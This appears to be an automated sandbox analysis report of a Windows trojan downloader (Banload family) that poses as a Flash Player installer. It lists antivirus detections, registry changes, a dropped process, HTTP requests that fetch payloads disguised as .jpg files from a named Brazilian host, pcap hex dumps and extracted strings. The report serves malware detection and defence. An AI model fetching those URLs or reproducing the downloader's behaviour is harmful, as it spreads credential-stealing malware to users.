Analysis Date2015-01-11 00:12:31
MD52217ffbddebd085cef93c309a8d3fd25
SHA11f6cd9e7504c082d74af9de83a7d34cb922ab1e4

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: cfb465a557f6d17567c5a2f0a915d676 sha1: 390c310f58c432f55ba5ba3efe5dbc2c2f8e9126 size: 258048
SectionUPX1 md5: 1a1bac5f5b7a825aac577915aa1c5422 sha1: cece3b2dcc7fc24def7406443b11a2fafd15240f size: 147456
Section.rsrc md5: 5c04843a4c4a790bd0ca17387d41ec01 sha1: 8ed1e35f2bf4ca6fe4b28998e0a080db92574f29 size: 7168
Timestamp1992-06-19 22:22:17
VersionLegalCopyright:
InternalName:
FileVersion: 1.0.0.1
CompanyName: ADOBE MACROMEDIA
LegalTrademarks:
Comments: Flash Player install
ProductName:
ProductVersion: 1.0.0.0
FileDescription: Flash Player
OriginalFilename:
PEhashfa0f7642e3fa4a97f869a1a1126bdf0c7f8db8ea
IMPhash9fbae326a7bee7f76e2670cb15d4a087
AV360 Safeno_virus
AVAd-AwareGen:Variant.Barys.724
AVAlwil (avast)Banload-GGW [Trj]
AVArcabit (arcavir)Gen:Variant.Barys.724
AVAuthentiumW32/Banload.A.gen!Eldorado
AVAvira (antivir)TR/Spy.Banker.Gen
AVBullGuardGen:Variant.Barys.724
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebTrojan.DownLoader6.58453
AVEmsisoftGen:Variant.Barys.724
AVEset (nod32)Win32/TrojanDownloader.Dadobra.NDG
AVFortinetW32/Banload.AH!tr.dldr
AVFrisk (f-prot)W32/Banload.A.gen!Eldorado
AVF-SecureGen:Variant.Barys.724
AVGrisoft (avg)Win32/DH{gQwlV2JO}
AVIkarusTrojan-Downloader.Win32.Dadobra
AVK7Trojan ( 00386dc51 )
AVKasperskyTrojan-Downloader.Win32.Banload.ypd
AVMalwareBytesTrojan.MSIL
AVMcafeeno_virus
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Banload.NJ
AVMicroWorld (escan)Gen:Variant.Barys.724
AVRisingno_virus
AVSophosMal/ZAccess-AH
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)BScope.Trojan.Agent

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates ProcessC:\WINDOWS\system32\process.exe
Winsock DNSwww.hosbeer.hpg.com.br
Winsock URLhttp://www.hosbeer.hpg.com.br/winrom.jpg
Winsock URLhttp://www.hosbeer.hpg.com.br/sphe.jpg
Winsock URLhttp://www.hosbeer.hpg.com.br/imglog.jpg
Winsock URLhttp://www.hosbeer.hpg.com.br/msshell.jpg
Winsock URLhttp://www.hosbeer.hpg.com.br/process.jpg
Winsock URLhttp://www.hosbeer.hpg.com.br/msne.jpg

Process
↳ C:\WINDOWS\system32\process.exe

Network Details:

DNSwww.hosbeer.hpg.com.br
Type: A
187.31.64.20
HTTP GEThttp://www.hosbeer.hpg.com.br/imglog.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.hosbeer.hpg.com.br/msne.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.hosbeer.hpg.com.br/sphe.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.hosbeer.hpg.com.br/winrom.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.hosbeer.hpg.com.br/msshell.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.hosbeer.hpg.com.br/process.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 187.31.64.20:80
Flows TCP192.168.1.1:1033 ➝ 187.31.64.20:80
Flows TCP192.168.1.1:1034 ➝ 187.31.64.20:80
Flows TCP192.168.1.1:1035 ➝ 187.31.64.20:80
Flows TCP192.168.1.1:1036 ➝ 187.31.64.20:80
Flows TCP192.168.1.1:1037 ➝ 187.31.64.20:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d67 6c6f672e 6a706720   GET /imglog.jpg 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e686f 73626565   Host: www.hosbee
0x000000b0 (00176)   722e6870 672e636f 6d2e6272 0d0a436f   r.hpg.com.br..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000d0 (00208)   6c697665 0d0a0d0a                     live....

0x00000000 (00000)   47455420 2f6d736e 652e6a70 67204854   GET /msne.jpg HT
0x00000010 (00016)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000020 (00032)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000030 (00048)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000040 (00064)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000050 (00080)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000060 (00096)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000070 (00112)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000080 (00128)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000090 (00144)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000a0 (00160)   73743a20 7777772e 686f7362 6565722e   st: www.hosbeer.
0x000000b0 (00176)   6870672e 636f6d2e 62720d0a 436f6e6e   hpg.com.br..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a0d0a                     ve......

0x00000000 (00000)   47455420 2f737068 652e6a70 67204854   GET /sphe.jpg HT
0x00000010 (00016)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000020 (00032)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000030 (00048)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000040 (00064)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000050 (00080)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000060 (00096)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000070 (00112)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000080 (00128)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000090 (00144)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000a0 (00160)   73743a20 7777772e 686f7362 6565722e   st: www.hosbeer.
0x000000b0 (00176)   6870672e 636f6d2e 62720d0a 436f6e6e   hpg.com.br..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a0d0a                     ve......

0x00000000 (00000)   47455420 2f77696e 726f6d2e 6a706720   GET /winrom.jpg 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e686f 73626565   Host: www.hosbee
0x000000b0 (00176)   722e6870 672e636f 6d2e6272 0d0a436f   r.hpg.com.br..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000d0 (00208)   6c697665 0d0a0d0a                     live....

0x00000000 (00000)   47455420 2f6d7373 68656c6c 2e6a7067   GET /msshell.jpg
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2077 77772e68 6f736265   .Host: www.hosbe
0x000000b0 (00176)   65722e68 70672e63 6f6d2e62 720d0a43   er.hpg.com.br..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000d0 (00208)   416c6976 650d0a0d 0a                  Alive....

0x00000000 (00000)   47455420 2f70726f 63657373 2e6a7067   GET /process.jpg
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2077 77772e68 6f736265   .Host: www.hosbe
0x000000b0 (00176)   65722e68 70672e63 6f6d2e62 720d0a43   er.hpg.com.br..C
0x000000c0 (00192)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000d0 (00208)   416c6976 650d0a0d 0a                  Alive....


Strings
\
-
.
.
P
.
..
$
@
#
;
.

041604E4
1.0.0.0
1.0.0.1
3D Dark Shadow
3D Light
9-+,
Abort
&Abort
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
A call to an OS function failed
Access violation
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
*A control cannot have itself as its parent
Active Border
Active Caption
ADOBE MACROMEDIA
&All
Alt+ Clipboard does not support Icons/Menu '%s' is already being used by another form
Ancestor for '%s' not found
Application Error1Format '%s' invalid or incompatible with argument
Application Workspace
April
Aqua
Assertion failed
August	September
Background
BBABORT
BBALL
BBCANCEL
BBCLOSE
BBHELP
BBIGNORE
BBNO
BBOK
BBRETRY
BBYES
Bitmap image is not valid
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
BkSp
Black
Blue
Button Face
Button Highlight
Button Shadow
Button Text
Cancel
Cannot assign a %s to a %s
Cannot create file "%s". %s
Cannot drag a form
Cannot hide an MDI Child Form)Cannot change Visible in OnShow or OnHide"Cannot make a visible window modal
Cannot open file "%s". %s
Canvas does not allow drawing
Caption Text
Class %s not found
clock
&Close
combobox
Comments
CompanyName
Confirm
Control-C hit
Cream
Ctrl+
December
Default	Gray Text
Division by zero
DLGTEMPLATE
Docked control must have a name
 - Dock zone has no control"Unable to find a Table of Contents
 - Dock zone not found
Down
DVCLAL
ebutton
edit
Enter
Error
Error creating window class+Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
%Error removing control from dock tree
Exception in safecall method
explorerbar
External exception %x
February
File access denied
FileDescription
File not found
FileVersion
Flash Player
Flash Player install
Floating point division by zero
Floating point overflow
Floating point underflow
Friday
Fuchsia
Gray
Green
header
&Help
Highlight Background
Highlight Text
Home
Icon image is not valid!Cannot change the size of an icon
&Ignore
Inactive Border
Inactive Caption
Inactive Caption Text
Info Background	Info Text
Information
Integer overflow Invalid floating point operation
Interface not supported
InternalName
Invalid argument
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid filename
Invalid ImageList
Invalid ImageList Index)Failed to read ImageList data from stream(Failed to write ImageList data to stream$Error creating window device context
Invalid image size
Invalid numeric input
Invalid pointer operation
Invalid property path
Invalid property value List capacity out of bounds (%d)
Invalid stream format$''%s'' is not a valid component name
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant type
Invalid variant type conversion
I/O error %d
January
jjjj
jjjjj
jjjjjj
July
June
Left
LegalCopyright
LegalTrademarks
Lime
List count out of bounds (%d)
List index out of bounds (%d)+Out of memory while expanding memory stream
listview
MAINICON
MAINICONU
March
Maroon
Medium Gray
menu
Menu Background	Menu Text
Menu index out of range
Menu inserted twice
Monday
Money Green
MS Sans Serif
Navy
No argument for format '%s'"Variant method calls not supported
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help keyword specified.
None
Not enough timers available@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active
N&o to All
November
October
Olive
Operation not supported
OriginalFilename
Out of memory
Out of system resources
PACKAGEINFO
page
PgDn
PgUp
PREVIEWGLYPH
Privileged instruction(Exception %s in module %s at %p.
ProductName
ProductVersion
progress
Property is read-only
Property %s does not exist
Purple
Range check error
Read
Read beyond end of file	Disk full
rebar
Resource %s not found
&Retry
Right
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Saturday
scrollbar
Scroll Bar
Shift+
Silver
!'%s' is not a valid integer value
Sky Blue
Space
spin
%s%s
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s (%s, line %d)
Stack overflow
startpanel
status
Stream read error
Stream write error
StringFileInfo
Sub-menu is not in menu
Sunday
System Error.  Code: %d.
taskband
taskbar
Teal
TFORM1
Thursday
toolbar
tooltip
Too many open files
trackbar
Translation
traynotify
treeview
Tuesday	Wednesday
Unexpected variant error
Unsupported clipboard format
VarFileInfo
)Variant or safe array index out of bounds
Variant or safe array is locked
Variant overflow
VS_VERSION_INFO
Warning
White
window
Window Background
Window Frame
Window Text
Write$Error creating variant or safe array
Yellow
&Yes
Yes to &All
 $$$' %  
 $$$$ $$ 
' $$$$   $ '
''''''
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
''''0.(
0123456789ABCDEF
1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
1j1}32A
 2001, 2002 Mike Lischke
2""333:"C8
2""#33:DC8
2$B""""C38
2C4"""D338
3:"""""
#32770
:33:"$
"*"$33
3333:"$
33333?
333333
333333?
3333333
$3333333
#3333333
33333333
33333333333
333333333333
333333333333?
33333333?333333
333333333333333
333333333333333333
3333333333333338
3333333:3333333383
333333:"33333338
3333333333338
33333:"$3333338
3333:"$3333338
3333339
333333:"C3333338
333333DDD3
333338
33333833
:*3:"$3338
#33338
33338?383
3333Dc3333333
3333f3333333?
3333fc33333338
3333>fd333338
3334JC33333338?333
3336Dc3333338
3336fC3333338
:*"*"$3338
333838
333*C33
333DDD33333?
333>fC333333
333>fd333333
$334B"$3
334C33333338
33B$3333333
33DDDDD3333
33fd3>fC333
33>ffffc338
34""C33333833
3B""$33333
3CommDlg
3Messages
4"*""C3338
4DF334DC33
-5)j"RTL
5Themes
`6`OEdOf/
8Registry
9[	kvj@
ACanvas
Accept
Action
ActivateKeyboardLayout
ActiveControl
ActnList
AdjustWindowRectEx
advapi32.dll
akBottom
akLeft
akRight
alBottom
alClient
alCustom
	AlignmentP]C
alLeft
alNone
AlphaBlendT
AlphaBlendValue(
alRight
Anchors
AnimateWindow
ANSI_CHARSET
ARABIC_CHARSET
Array 
	AutoCheck
AutoHotkeys
AutoHotkeysP]C
AutoLineReduction
AutoLineReductionL
	AutoMerge$
	AutoPopup$
AutoScroll
AutoSize$
aVirtu
;B0uGj
BALTIC_CHARSET
bdLeftToRight
bdRightToLeft
bdRightToLeftNoAlign
bdRightToLeftReadingOnly
BeginPaint
BiDiMode
biHelp
biMaximize
biMinimize
biSystemMenu
BitBlt
Bitmap
;Blu	3
Boolean
BorderIconsX
BorderStyle
BorderWidth
BP_^[]
Brush<
bsBDiagonal
bsClear
bsCross
bsDiagCross
bsDialog
bsFDiagonal
bsHorizontal
bsNone
bsSingle
bsSizeable
bsSizeToolWin
bsSolid
bsToolWindow
bsVertical
Button
Buttons
ButtonSize
ByRef 
:"C333
"$c33333
c333333
"C333333
C3333333
C33333833?33
"C3338
c33*C333
"C8338
caFree
caHide
CallHelp
CallNextHookEx
CallWindowProcA
caMinimize
Cancel
CanClose
CanDock
caNone
Caption
Caption<
Cardinal
Category
#Cc+(h
C ;C$s
Cd;Cpt
CharLowerA
CharNextA
Charset
CharToOemA
Ch;Ctt
Checked
CheckMenuItem
CHINESEBIG5_CHARSET
CHYZ]_^[
CjC338
$:Cjt_
cl3DDkShadow
cl3DLight
clActiveBorder
clActiveCaption
clAppWorkSpace
clAqua
Classes
^Classes
ClassesX
clBackground
clBlack
clBlue
clBtnFace
	clBtnFace
clBtnHighlight
clBtnShadow
clBtnText
clCaptionText
clCream
clDefault
clFuchsia
clGradientActiveCaption
clGradientInactiveCaption
clGray
clGrayText
clGreen
clHighlight
clHighlightText
clHotLight
Client
ClientHeight<
ClientToScreen
ClientWidth
clInactiveBorder
clInactiveCaption
clInactiveCaptionText
clInfoBk
clInfoText
Clipbrd
clLime
clMaroon
clMedGray
clMenu
clMenuBar
clMenuHighlight
clMenuText
clMoneyGreen
clNavy
clNone
clOlive
CloseHandle
CloseThemeData
clPurple
clScrollBar
clSilver
clSkyBlue
clTeal
;CLtX3
clWhite
clWindow
clWindowFrame
clWindowText
clYellow
Color<
comctl32.dll
Command
CommCtrl
commdlg_FindReplace
commdlg_help
CompareStringA
ComStrs
Constraints
Consts
Contnrs
ControlOfs%.8X%.8X
Controls
&Controls
Controls	
CopyMode
crAppStart
crArrow
crCross
crDefault
crDrag
CreateBitmap
CreateBrushIndirect
CreateCompatibleBitmap
CreateCompatibleDC
CreateDIBitmap
CreateDIBSection
CreateEventA
CreateFileA
CreateFontIndirectA
CreateHalftonePalette
CreateIcon
CreateMenu
CreatePalette
CreatePenIndirect
CreatePopupMenu
CreateSolidBrush
CreateThread
CreateWindowExA
crHandPoint
crHelp
crHourGlass
crHSplit
crIBeam
crMultiDrag
crNoDrop
crSize
crSizeAll
crSizeNESW
crSizeNS
crSizeNWSE
crSizeWE
crSQLWait
crUpArrow
crVSplit
$;Ctt?
Currency
Cursor
CUxTheme
CVariants
C(_^[Y]
\ `DATS
"dc3333833
D*C33383
:DC33:""$8
"DDB""$3
Decimal
Default
DEFAULT_CHARSET
DefaultMonitor
DefFrameProcA
DefMDIChildProcA
DefWindowProcA
DeleteCriticalSection
DeleteDC
DeleteMenu
DeleteObject
Delphi%.8X
Delphi Component
Delphi Picture
DesignSize
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
Dialogs
DIBeTab
Dispatch
DispatchMessageA
DISPLAY
%.*d(k@
dkDock
dkDrag
dmActiveForm
dmAutomatic
	dmDesktop	dmPrimary
dmMainForm
dmManual
DockClient
DockSite
Double
DragKind
DragMode
DragObject
DrawEdge
DrawFrameControl
DrawIcon
DrawIconEx
DrawMenuBar
DrawTextA
DrawThemeBackground
DrawThemeEdge
DrawThemeIcon
DrawThemeParentBackground
DrawThemeText
dsDragEnter
dsDragLeave
dsDragMove
dStdCtrls
e3usb7
EAbstractError
EAccessViolation
EActnList
EAssertionFailed
EASTEUROPE_CHARSET
EBitsError
EClassNotFound
EComponentError
	EControlC
EConvertError
EDivByZero
	EExternal
EExternalException
EFCreateError
EFilerError
EFileStreamError
EF|(ND_k/
EFOpenErrorT
EHeapException
EHelpSystemException
EInOutErrorTn@
	EIntError
EIntfCastError
EIntOverflow
EInvalidCast
EInvalidGraphic
EInvalidGraphicOperation
EInvalidOp
EInvalidOperation
EInvalidPointer
EListError
EMathError
EMenuError
Enabled
Enabled|
EnabledT
EnableMenuItem
EnableScrollBar
EnableThemeDialogTexture
EnableTheming
EnableWindow
EndPaint
EnterCriticalSection
EnumCalendarInfoA
EnumDisplayMonitors
EnumThreadWindows
EnumWindows
EOSError
EOutOfMemory
EOutOfResources
	EOverflow
EPrivilege
E$PVSj
EqualRect
ERangeError
EReadError
EResNotFound
ESafecallException
EStackOverflow
EStreamError
EStringListError
EThread4
EUnderflow
EVariantArrayCreateError
EVariantArrayLockedError
EVariantBadIndexError
EVariantBadVarTypeError4
EVariantDispatchError
EVariantError
EVariantInvalidArgError
EVariantInvalidOpError
EVariantNotImplError
EVariantOutOfMemoryError
EVariantOverflowError
EVariantTypeCastError
EVariantUnexpectedError
EWriteError\
	ExceptionDm@
ExcludeClipRect
ExitProcess
ExtActns
ExtCtrls
ExtDlgs
EZeroDividexq@
]EZO6#H{
fC333?3
fC33333
fDFfC338
F*F333383
fff3333
FillRect
FindClose
FindFirstFileA
FindResourceA
FindWindowA
FlatSB
FlatSB_EnableScrollBar
FlatSB_GetScrollInfo
FlatSB_GetScrollPos
FlatSB_GetScrollProp
FlatSB_GetScrollRange
FlatSB_SetScrollInfo
FlatSB_SetScrollPos
FlatSB_SetScrollProp
FlatSB_SetScrollRange
FlatSB_ShowScrollBar
Font.Charset
Font.Color
Font.Height
	Font.Name
Font.Style
FormatMessageA
Forms|
Forms	
Forms0
	FormStyle<
FormsU
	fpDefault
fpFixed
FPUMaskValue
fpVariable
FrameRect
FreeLibrary
FreeResource
fsBold
f;sDtsf
fsItalic
fsMDIChild	fsMDIForm
fsNormal
fsStayOnTop
fsStrikeOut
fsUnderline
@?:F?v
F(Z_^[
:GauOFKu
GB2312_CHARSET
gdi32.dll
GetACP
GetActiveWindow
GetBitmapBits
GetBrushOrgEx
GetCapture
GetClassInfoA
GetClassNameA
GetClientRect
GetClipBox
GetCommandLineA
GetCPInfo
GetCurrentPositionEx
GetCurrentProcessId
GetCurrentThemeName
GetCurrentThreadId
GetCursor
GetCursorPos
GetDateFormatA
GetDCEx
GetDCOrgEx
GetDesktopWindow
GetDeviceCaps
GetDIBColorTable
GetDIBits
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFocus
GetForegroundWindow
GetFullPathNameA
GetIconInfo
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardState
GetKeyboardType
GetKeyNameTextA
GetKeyState
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetLocalTime
GetLongPathNameA
GetMenu
GetMenuItemCount
GetMenuItemID
GetMenuItemInfoA
GetMenuState
GetMenuStringA
GetModuleFileNameA
GetModuleHandleA
GetMonitorInfo
GetMonitorInfoA
GetMonitorInfoW
GetObjectA
GetPaletteEntries
GetParent
GetPixel
GetProcAddress
GetPropA
GetScrollInfo
GetScrollPos
GetScrollRange
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeExA
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemDirectoryA
GetSystemInfo
GetSystemMenu
GetSystemMetrics
GetSystemPaletteEntries
GetTextExtentPoint32A
GetTextMetricsA
GetThemeAppProperties
GetThemeBackgroundContentRect
GetThemeBackgroundRegion
GetThemeBool
GetThemeColor
GetThemeDocumentationProperty
GetThemeEnumValue
GetThemeFilename
GetThemeFont
GetThemeInt
GetThemeIntList
GetThemeMargins
GetThemeMetric
GetThemePartSize
GetThemePosition
GetThemePropertyOrigin
GetThemeRect
GetThemeString
GetThemeSysBool
GetThemeSysColor
GetThemeSysColorBrush
GetThemeSysFont
GetThemeSysInt
GetThemeSysSize
GetThemeSysString
GetThemeTextExtent
GetThemeTextMetrics
GetThreadLocale
GetTickCount
GetTopWindow
GetVersion
GetVersionExA
GetWindow
GetWindowDC
GetWindowLongA
GetWindowOrgEx
GetWindowPlacement
GetWindowRect
GetWindowTextA
GetWindowTheme
GetWindowThreadProcessId
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFree
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
Graphics
+Graphics
GREEK_CHARSET
GroupIndex
Handled
HANGEUL_CHARSET
 !"#$%H^B
HEBREW_CHARSET
Height
HelpContext
HelpContext$
HelpContextl
HelpFileP
:	HelpIntfs
:	HelpIntfs	
HelpKeyword
HelpType
Hfx-aB
Hint@DC
HitTestThemeBackground
HlinkNavigateString
HorzScrollBar
HorzScrollBarP
	htKeyword	htContext
http://www.hosbeer.hpg.com.br/imglog.jpg
http://www.hosbeer.hpg.com.br/msne.jpg
http://www.hosbeer.hpg.com.br/msshell.jpg
http://www.hosbeer.hpg.com.br/process.jpg
http://www.hosbeer.hpg.com.br/sphe.jpg
http://www.hosbeer.hpg.com.br/winrom.jpg
;~hu	3
IChangeNotifier
ICustomHelpViewer
.idata
IDesignerHookD
IDesignerNotify
IDockManager
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IExtendedHelpViewer
Ignore
IgnoreFontProperty
IHelpManager
IHelpSelector
IHelpSystem
Ih;J4u
IInterface
ImageIndex
ImageList_Add
ImageList_BeginDrag
ImageList_Create
ImageList_Destroy
ImageList_DragEnter
ImageList_DragLeave
ImageList_DragMove
ImageList_DragShowNolock
ImageList_Draw
ImageList_DrawEx
ImageList_EndDrag
ImageList_GetBkColor
ImageList_GetDragImage
ImageList_GetIconSize
ImageList_GetImageCount
ImageList_Read
ImageList_Remove
ImageList_ReplaceIcon
ImageList_SetBkColor
ImageList_SetDragCursorImage
ImageList_SetIconSize
ImageList_Write
ImageList_WriteEx
Images
Images0fC
ImgList
imglog
imm32.dll
ImmGetCompositionStringA
ImmGetContext
ImmGetConversionStatus
ImmIsIME
ImmNotifyIME
ImmReleaseContext
ImmSetCompositionFontA
ImmSetCompositionWindow
ImmSetConversionStatus
ImmSetOpenStatus
	Incrementh
inExec&aF
InflateRect
InfluenceRect
INFNAN
IniFiles
InitializeCriticalSection
InitializeFlatSB
InsertMenuA
InsertMenuItemA
Integer
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
IntersectClipRect
IntersectRect
Intervall
InvalidateRect
IOleForm
ipbrd(Y
IsAppThemed
IsChild
IsControl
IsDialogMessageA
IsIconic
ISpecialWinHelpViewer
IsRectEmpty
isso q ta aqui dentro e q tira dos avs
IsThemeActive
IsThemeBackgroundPartiallyTransparent
IsThemeDialogTextureEnabled
IsThemePartDefined
IStringsAdapter
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
"J333333
"J"C3333
JOHAB_CHARSET
JumpID("","%s")
''K!>&
kernel32.dll
KERNEL32.DLL
KeyPreview
K Gfs3O
KillTimer
KWindows
~KxI[)
layout text
LeaveCriticalSection
lgeduv
	~LibrazS
LineTo
ListActns
LoadBitmapA
LoadCursorA
LoadIconA
LoadKeyboardLayoutA
LoadLibraryA
LoadLibraryExA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LockResource
LongWord
lstrcpyA
lstrcpynA
lstrlenA
maAutomatic
maBottomToTop
MAC_CHARSET
Magellan MSWHEEL
MAINICON
maLeftToRight
maManual
maNone
maParent
MAPI32.DLL
MapVirtualKeyA
MapWindowPoints
Margin
maRightToLeft
MaskBlt
maTopToBottom
	MaxHeight
	MaxHeight<
MaxWidth
MaxWidth<
mbBarBreak
mbBreak
mbLeft
mbMiddle
mbNone
mbRight
MDICLIENT
m/d/yy
MenuAnimation
MenusT]C
MessageBoxA
	MinHeight
	MinHeight<
MinWidth
mmmm d, yyyy
:mm:ss
MonitorFromPoint
MonitorFromRect
